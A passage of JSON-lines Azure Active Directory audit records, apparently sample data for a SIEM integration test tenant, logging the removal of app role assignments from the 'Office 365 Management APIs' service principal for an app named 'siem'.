"nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": 
"7bca6665-4d58-4df9-bd34-4d92e1fc63aa"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, 
{"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", 
"SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": 
"extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": 
"env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": 
"ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": 
"User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": 
"env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", 